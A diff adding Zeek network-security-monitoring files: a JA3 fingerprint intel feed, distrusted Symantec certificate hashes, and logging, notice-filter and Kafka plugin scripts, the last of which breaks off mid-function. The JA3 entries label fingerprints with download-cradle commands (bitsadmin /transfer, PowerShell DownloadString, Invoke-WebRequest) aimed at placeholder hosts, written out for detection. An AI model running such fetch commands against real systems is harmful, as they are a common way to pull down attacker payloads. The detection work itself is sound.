+8c4a22651d328568ec66382a84fc505f	Intel::JA3	ja3	OS:Server 2016,Software:BitsAdmin (Microsoft BITS/7.5),Command:bitsadmin /transfer debjob /download /priority normal https://[IP]/ c:\Users\Administrator\temp	F	-
+235a856727c14dba889ddee0a38dd2f2	Intel::JA3	ja3	OS:Server 2016,Software:PowerShell 5.1,Command:$wc.DownloadString(https://[domain]/)	F	-
+17b69de9188f4c205a00fe5ae9c1151f	Intel::JA3	ja3	OS:Server 2016,Software:PowerShell 5.1,Command:$wc.DownloadString(https://[IP]/)	F	-
+54328bd36c14bd82ddaa0c04b25ed9ad	Intel::JA3	ja3	OS:Windows 10,Software:PowerShell 5.1,Command:Invoke-WebRequest https://[domain]	F	-
+fc54e0d16d9764783542f0146a98b300	Intel::JA3	ja3	OS:Windows 10,Software:PowerShell 5.1,Command:Invoke-WebRequest https://[IP]	F	-
+05af1f5ca1b87cc9cc9b25185115607d	Intel::JA3	ja3	OS:Windows 7 32 bit enterprise,Software:PowerShell 4.0,Command:Invoke-WebRequest https://[domain]	F	-
+8c4a22651d328568ec66382a84fc505f	Intel::JA3	ja3	OS:Windows 7 32 bit enterprise,Software:PowerShell 4.0,Command:Invoke-WebRequest https://[IP]	F	-
+2863b3a96f1b530bc4f5e52f66c79285	Intel::JA3	ja3	OS:Windows Server 2012RT,Software:PowerShell 6.0,Command:Invoke-WebRequest -uri https://[domain] -sslprotocol tls	F	-
+40177d2da2d0f3a9014e7c83bdeee15a	Intel::JA3	ja3	OS:Windows Server 2012RT,Software:PowerShell 6.0,Command:Invoke-WebRequest -uri https://[domain] -sslprotocol tls11	F	-
+36f7277af969a6947a61ae0b815907a1	Intel::JA3	ja3	OS:Windows 7 32 bit enterprise,Software:BitsAdmin,Command:bitsadmin /transfer debjob /download /priority normal https://[domain]/ c:\Users\Administrator\temp	F	-
+36f7277af969a6947a61ae0b815907a1	Intel::JA3	ja3	OS:Windows 7 64 bit enterprise,Software:PowerShell 6.0,Command:Invoke-WebRequest https://[domain]	F	-
--- a/capitalone/frameworks/intel/feeds/symantec-bad-issuers.dat
+++ b/capitalone/frameworks/intel/feeds/symantec-bad-issuers.dat
@ -0,0 +1,68 @@
+#fields	indicator	indicator_type	meta.desc	meta.source	meta.url
+08297A4047DBA23680C731DB6E317653CA7848E1BEBD3A0B0179A707F92CF178	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+CF56FF46A4A186109DD96584B5EEB58A510C4275B0E5F94F40BBAE865E19F673	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+5F0B62EAB5E353EA6521651658FBB65359F443280A4AFBD104D77D10F9F04C07	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+CA2D82A08677072F8AB6764FF035676CFE3E5E325E012172DF3F92096DB79B85	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+E6B8F8766485F807AE7F8DAC1670461F07C0A13EEF3A1FF717538D7ABAD391B4	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+EBF3C02A8789B1FB7D511995D663B72906D913CE0D5E10568A8A77E2586167E7	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+309B4A87F6CA56C93169AAA99C6D988854D7892BD5437E2D07B29CBEDA55D35D	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+AB7036365C7154AA29C2C29F5D4191163B162A2225011357D56D07FFA7BC1F72	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+B4410B73E2E6EACA47FBC42F8FA4018AF4381DC54CFAA84450461EED09454DE9	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+84FF58E17802F8A7BDDE3248112C48D26B611B8C62F850647F8FE8B05FD9ED55	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+AF2FAD1656F83A44213865E4F5D38940602C05F8BA2BB577B30C052B72E6DD68	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+0AE1484292B20EE696D4593DBE46F91479F8DAD58FC057CFD52FA3FA8FB3CE4B	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+C99157DF28D28EBD87B8B041AACCF023CF1C9AD0D21FD7116149D7F96484FA51	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+AFF5859FCDB61056D6852692427AF7AECBBD41D9DD1EB20D0BFCC3986E6AF93D	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+98D6C7DE72B2CC23FB24478007E4469A3DE7DABC620B63915BA0061333C057CE	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+C38DCB38959393358691EA4D4F3CE495CE748996E64ED1891D897A0FC4DD55C6	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+51847C8CBD2E9A72C91E292D2AE247D7DE1E3FD270547A20EF7D610F38B8842C	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+341DE98B1392ABF7F4AB90A960CF25D4BD6EC65B9A51CE6ED067D00EC7CE9B7F	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+3A43E220FE7F3EA9653D1E21742EAC2B75C20FD8980305BC502CAF8C2D9B41A1	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+E7685634EFACF69ACE939A6B255B7B4FABEF42935B50A265ACB5CB6027E44E70	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+83CE3C1229688A593D485F81973C0F9195431EDA37CC5E36430E79C7A888638B	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+A4B6B3996FC2F306B3FD8681BD63413D8C5009CC4FA329C2CCF0E2FA1B140305	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+E389360D0FDBAEB3D250584B4730314E222F39C156A020144E8D960561791506	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+5B789987F3C4055B8700941B33783A5F16E0CFF937EA32011FE04779F7635308	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+AC1FAE74B4E97106092131F2E7F746B6734386742BDFD8423731AED14A4CE446	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+752DD2F438150529B9E8ACA17C66D06DA0A7E44771F5F08E467B0AF98E85FF50	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+AB1ECA5E9DA38F546520FD035B8139DEB9E5570C14801444174E815BDAA8A56F	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+DC07B175C81424537D532B104CB85A605116B48CF1513916911858FF13E42869	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+D5ECF925E40132A3B6D4B5F3AC629A3185EDAEE846AE033A799DBCDEB668AB8F	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+D8DC43C4C062763BDB36DB725739FAF4508363FE6F158CDA474D51D719C2C222	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+0F0C18C714009CA0144B4A66BE74A872160EC826A085A43D90DF164F1E9AA219	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+F9AA26FE1A0A1E0BBEB10F229C1CDB40560A0AFF63983562C3B8A5F7D3F0FF3E	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+A48A6DDD5DD55CAF68CCAAE0A598979CAE35BFD3AC6E20B511FAA7874FBFB692	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+A7E7AD642A7F11A189A4A0F701CF5B71BCF9C9A42730BBC05A9197D3C610963B	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+856B93238C0D74BB4FC5087CA967C7B6CC9203027AA55B30B24D11C1E0B1C105	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+F0D0E6392E14347A52C4A7FE55501730B5943F7FAC9DCD2A43C8BFC0643D9B12	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+55B504A4F2B37996B7AA65C91080E96D7E54ABF08C0A3912A72DF567A6A97760	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+356A86A3A0B9FFC707EEF818CEC7FDFC148FA4A92C137B1BE9557CFD2BD0B8B5	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+A19AAC784C27238AAB7FDDCC36B78A43358B619E50613028C3DD4FE8E6FB5225	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+92E777CDE21123F372E123623BD3B647BBD770DCE79411D76292E930048E47A0	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+9A950C1AF717C153E3A4CC96B7D74121B35E3B304237394882D067710A24CE01	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+A02651D6A63256535F82CB3C75E870A0F65A652CF576CA3AD3DDA1749DF8C9CC	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+989F8CA5BE870B03DF5B8451E0159FFE30DEB1D8403B3FE3C8E66BD63E6BA63E	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+4B87C6E567D2C156EDB9352357BD8B16E97B1BBBAA5B3073D7F82D505EA0FE3D	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+7A7155B7D16AD2EFCB2D888B9B9FA51E784515343B987296473143D114E949A4	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+A4621F3568B000D8109827E585A9D55D9B809A6F6AD57F0FB36660562C588462	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+D1E2F0A4F1D2018EA79B3933A7570C1EED9CA83E600112AA8ED16D804C077E7C	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+DB097E9719C47FCD90BD33D63019326410BBAA889D34EA4BA7B3E364B6518A84	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+AA656237D9A3B40F2B39E098FF134F408491068175CD4DCC879A52695852F03F	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+3E4F6651D8D3198C42E39532325FCEA42EEB66DF6B752D55ACFEE5ED1996AEFE	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+A653367C7267FC5B87A8380E3AAFE6071BD1D813043F75C1D5E9F694224AD9B3	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+E92E09416E090D95667FCAF80AA0D46A2311AA4C7C706030B277500F94AE639B	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+1619E3EC381421B29587A67FA63E06938C191374B30714264659E2C7101AACC5	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+3DAB94FADD651DA54996D4F362A8FAFC36AB19A3ED25CCD19EDB1E3BD0AD5AC9	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+817FE201F7A33CFC1E8B0D4147BCCE7B2041BCBCF04D85CA88ED5855318111F3	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+893780C6D4C09C6D5523D1D5FFAE0CC63CE1329050BF5D1BB69E3758B1499897	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+AED50FFF622CCA42314D02E5886F82348FEC2EFD2F7ABDE92F84B6611B1F4461	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+06AF46E6FD2ED0376DB462BB53ACA7D619540B71413F342D834F2C4F062B5FC8	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+100C3AAEE557258903B16A4D04A7030D4E64AD64D5460EB06FB2E3034BF5F2AC	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+71BDB1D6F13483EE5E728A18FF8A281828E0A6AB087172A0BEB1CD85910405CB	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+692F58ACF09BE0D331E5FB65FFB0F05E66CEA8DB6792E8C28F2D366BF6DBF688	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+1D837486C2C4A5A3AF8031FA2C6930B5655BD7775D11AC1BD00D3AE960444188	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+50505039F8CBD1D36739BCF80D334F532F6817A332ADD4352F1F4FEE9915CD8A	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+DC492F2AEF4B558B3572DE10665D263D3BC5A39AE2F967FB682DA6B1B33E1A18	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+AD5342CBB8EA0F3A5B212C597CF02545C619F642E9BDAAF9A36F4AD8112065E8	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+298D0396656CF8841B6C42BD73C3D6CA1899B4F4944ED6100B8BA4D311F06DBD	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
+5ED061BF309F60022EFD350C45854A9F62449BC2A99D5C7953E2573CD498732E	Intel::CERT_HASH	Symantec-Issued Certificate	CCADB (http://Symantec-Issued Certificate	CCADB.org/) All Certs	https://blog.mozilla.org/security/2018/03/12/distrust-symantec-tls-certificates/
--- a/capitalone/frameworks/logging/extension.zeek
+++ b/capitalone/frameworks/logging/extension.zeek
@ -0,0 +1,44 @@
+#
+# Copyright (c) 2017-2018 RockNSM.
+#
+# This file is part of RockNSM
+# (see http://rocknsm.io).
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+#
+
+type Extension: record {
+	## The log stream that this log was written to.
+	stream:   string &log;
+	## The name of the system that wrote this log. This
+	## is defined in the `system_in_log` const so that
+	## a system running lots of processes can give the
+	## same value for any process that writes a log.
+	system:   string &log;
+	## The name of the process that wrote the log. In
+	## clusters, this will typically be the name of the
+	## worker that wrote the log.
+	proc:     string &log;
+};
+
+function add_log_extension(path: string): Extension
+{
+	return Extension($stream   = path,
+	                 $system   = split_string(gethostname(), /\./)[0],
+	                 $proc     = peer_description);
+}
+
+redef Log::default_ext_func = add_log_extension;
+redef Log::default_ext_prefix = "@";
+redef Log::default_scope_sep="_";
--- a/capitalone/frameworks/logging/purplerain.zeek
+++ b/capitalone/frameworks/logging/purplerain.zeek
@ -0,0 +1,118 @@
+#
+# Copyright (c) 2017 Capital One. All rights reserved.
+# Author: Derek Ditch <derek.ditch@criticalstack.com>
+#
+
+@load policy/misc/capture-loss
+@load policy/protocols/conn/weirds
+@load policy/protocols/dns/detect-external-names
+@load policy/protocols/ftp/detect-bruteforcing
+@load policy/protocols/ftp/detect
+@load policy/protocols/http/detect-sqli
+@load policy/frameworks/intel/do_notice
+@load policy/frameworks/packet-filter/shunt
+@load policy/frameworks/dpd/detect-protocols
+@load policy/misc/scan
+@load policy/protocols/smtp/blocklists
+@load policy/protocols/smtp/detect-suspicious-orig
+@load policy/frameworks/software/version-changes
+@load policy/frameworks/software/vulnerable
+@load policy/protocols/ssh/interesting-hostnames
+@load policy/protocols/ssh/geo-data
+@load policy/protocols/ssh/detect-bruteforcing
+@load policy/protocols/ssl/expiring-certs
+@load policy/protocols/ssl/validate-ocsp
+@load policy/protocols/ssl/validate-certs
+@load policy/protocols/ssl/weak-keys
+@load policy/frameworks/files/detect-MHR
+@load policy/misc/detect-traceroute
+
+module PurpleRain;
+
+export {
+  const pr_notice_types: set[Notice::Type] = {
+  #  Authentication::BruteForcing,
+  #  Authentication::UnauthorizedAccount,
+  #  Authentication::UnauthorizedKerbService,
+  #  Authentication::UnauthorizedMethod,
+  #  Authentication::UnauthorizedSource,
+    CaptureLoss::Too_Much_Loss,
+  #  Conn::Content_Gap,
+    Conn::Retransmission_Inconsistency,
+    DNS::External_Name,
+    FTP::Bruteforcing,
+    FTP::Site_Exec_Success,
+  #  Heartbleed::SSL_Heartbeat_Attack,
+  #  Heartbleed::SSL_Heartbeat_Attack_Success,
+  #  Heartbleed::SSL_Heartbeat_Many_Requests,
+  #  Heartbleed::SSL_Heartbeat_Odd_Length,
+    HTTP::SQL_Injection_Attacker,
+    HTTP::SQL_Injection_Victim,
+    Intel::Notice,
+  #  Intel::Dynamic_DNS,
+  #  Intel::IP_from_Watched_Domain,
+    Notice::Tally,
+  #  Oracle::Authentication,
+  #  Oracle::Connection,
+  #  Oracle::Query,
+    PacketFilter::Cannot_BPF_Shunt_Conn,
+    PacketFilter::Compile_Failure,
+    PacketFilter::Dropped_Packets,
+    PacketFilter::Install_Failure,
+    PacketFilter::No_More_Conn_Shunts_Available,
+    PacketFilter::Too_Long_To_Compile_Filter,
+  #  ProtocolDetector::Protocol_Found,
+    ProtocolDetector::Server_Found,
+  #  RDP::Connection,
+    Scan::Address_Scan,
+    Scan::Port_Scan,
+    Signatures::Count_Signature,
+    Signatures::Multiple_Sig_Responders,
+    Signatures::Multiple_Signatures,
+    Signatures::Sensitive_Signature,
+    Signatures::Signature_Summary,
+  #  SMB::Admin_Share_Access,
+  #  SMB::At_Task_Scheduler,
+  #  SMB::Registry_Access,
+  #  SMB::Sensitive_Directory_Access,
+  #  SMB::Service_Create,
+  #  SMB::Service_Start,
+  #  SMB::Service_Stop,
+    SMTP::Blocklist_Blocked_Host,
+    SMTP::Blocklist_Error_Message,
+    SMTP::Suspicious_Origination,
+    Software::Software_Version_Change,
+    Software::Vulnerable_Version,
+    SSH::Interesting_Hostname_Login,
+    SSH::Login_By_Password_Guesser,
+    SSH::Password_Guessing,
+    SSH::Watched_Country_Login,
+  #  SSL::Certificate_Changed,
+    SSL::Certificate_Expired,
+    SSL::Certificate_Expires_Soon,
+    SSL::Certificate_Not_Valid_Yet,
+    SSL::Invalid_Ocsp_Response,
+    SSL::Invalid_Server_Cert,
+    SSL::Old_Version,
+    SSL::Weak_Cipher,
+    SSL::Weak_Key,
+    TeamCymruMalwareHashRegistry::Match,
+    Traceroute::Detected,
+  #  Tunneling::DNS,
+  #  Tunneling::ICMP,
+  #  Tunneling::Teredo,
+  #  VirusTotal::Match,
+    Weird::Activity
+    } &redef;
+}
+
+function purple_rain_notices(rec: Notice::Info) : bool
+  {
+    return rec$note in pr_notice_types;
+  }
+
+event zeek_init()
+  {
+    local filter: Log::Filter = [$name="pr-notices", $path="pr-notice", $pred=purple_rain_notices];
+    Log::add_filter(Notice::LOG, filter);
+  }
--- a/capitalone/local/load.zeek
+++ b/capitalone/local/load.zeek
@ -0,0 +1,6 @@
+#
+# Copyright (c) 2017 Capital One. All rights reserved.
+# Author: Derek Ditch <derek.ditch@criticalstack.com>
+#
+
+@load ./main.zeek
--- a/capitalone/local/main.zeek
+++ b/capitalone/local/main.zeek
@ -0,0 +1,14 @@
+#
+# Copyright (c) 2017 Capital One. All rights reserved.
+# Author: Derek Ditch <derek.ditch@criticalstack.com>
+#
+
+# Disable local logging
+#@load ../frameworks/logging/disable-ascii.zeek
+
+#Enable local logging in JSON format
+@load ./plugins/json-logs
+
+# Load plugin config
+@load ./plugins
+
--- a/capitalone/local/plugins/load.zeek
+++ b/capitalone/local/plugins/load.zeek
@ -0,0 +1,6 @@
+
+@load ./json-logs
+@load ./afpacket
+
+# Pre-SDP requirement
+# @load ./kafka
--- a/capitalone/local/plugins/afpacket.zeek
+++ b/capitalone/local/plugins/afpacket.zeek
@ -0,0 +1,22 @@
+#
+# Copyright (c) 2015-2018 RockNSM.
+#
+# This file is part of RockNSM
+# (see http://rocknsm.io).
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+# Configure the interface workers to get the fanout_id from the node.cfg environment
+redef AF_Packet::fanout_id = strcmp(getenv("fanout_id"),"") == 0 ? 0 : to_count(getenv("fanout_id"));
+
--- a/capitalone/local/plugins/json-logs.zeek
+++ b/capitalone/local/plugins/json-logs.zeek
@ -0,0 +1,3 @@
+@load tuning/json-logs
+redef LogAscii::json_timestamps = JSON::TS_ISO8601;
+redef LogAscii::use_json = T;
--- a/capitalone/local/plugins/kafka.zeek
+++ b/capitalone/local/plugins/kafka.zeek
@ -0,0 +1,85 @@
+#
+# Copyright (c) 2016-2018 RockNSM.
+#
+# This file is part of RockNSM
+# (see http://rocknsm.io).
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+# vim ft=bro
+# Ansible managed
+#
+
+module Kafka;
+
+redef Kafka::kafka_conf = table (
+    ["metadata.broker.list"] = "127.0.0.1:9092",
+    ["client.id"] = fmt("zeek-%s", split_string(gethostname(), /\./)[0])
+);
+
+redef Kafka::tag_json = F;
+redef Kafka::topic_name = "";
+redef Kafka::json_timestamps = JSON::TS_ISO8601;
+redef Kafka::logs_to_send = {};
+
+export {
+    const logs_to_ignore: set[Log::ID] &redef;
+    const ignore_services = set("dns", "krb", "krb_tcp") &redef;
+}
+
+#
+# NOTE: Uncomment the following line to write syslog.log to the local filesystem
+# redef Kafka::logs_to_ignore = { Syslog::LOG };
+#
+
+event zeek_init() &priority=-5
+{
+    for (stream_id in Log::active_streams) {
